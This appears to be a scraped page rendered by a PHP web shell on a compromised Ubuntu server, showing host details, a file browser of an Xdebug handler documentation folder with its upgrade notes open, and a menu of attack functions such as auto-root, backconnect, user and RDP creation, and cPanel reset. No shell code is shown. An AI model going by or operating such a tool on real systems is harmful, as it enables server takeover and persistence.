Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
php-composer-xdebug-handler /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md.gz
4.3
KB
-rw-r--r--
UPGRADE.md
1.31
KB
-rw-r--r--
changelog.Debian.gz
1.06
KB
-rw-r--r--
copyright
1.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UPGRADE.md
## Upgrading from 1.x The default behaviour has changed from always restarting if Xdebug is loaded, to only restarting if Xdebug is _active_. This has been introduced to support Xdebug3 [modes](https://xdebug.org/docs/all_settings#mode). Xdebug is considered active if it is loaded, and for Xdebug3, if it is running in a mode other than `xdebug.mode=off`. * Break: removed optional `$colorOption` constructor param and passthru fallback. Just use `new XdebugHandler('myapp')` to instantiate the class and color support will be detectable in the restarted process. * Added: `isXdebugActive()` method to determine if Xdebug is still running in the restart. Returns true if Xdebug is loaded and is running in an active mode (if it supports modes). Returns false if Xdebug is not loaded, or it is running with `xdebug.mode=off`. ### Extending classes * Break: renamed `requiresRestart` param from `$isLoaded` to `$default`. This reflects the new default behaviour which is to restart only if Xdebug is active. * Break: changed `restart` param `$command` from a string to an array. Only important if you modified the string. `$command` is now an array of unescaped arguments. * Added: Process utility class to the API. This class was previously annotated as @internal and has been refactored due to recent changes.
Close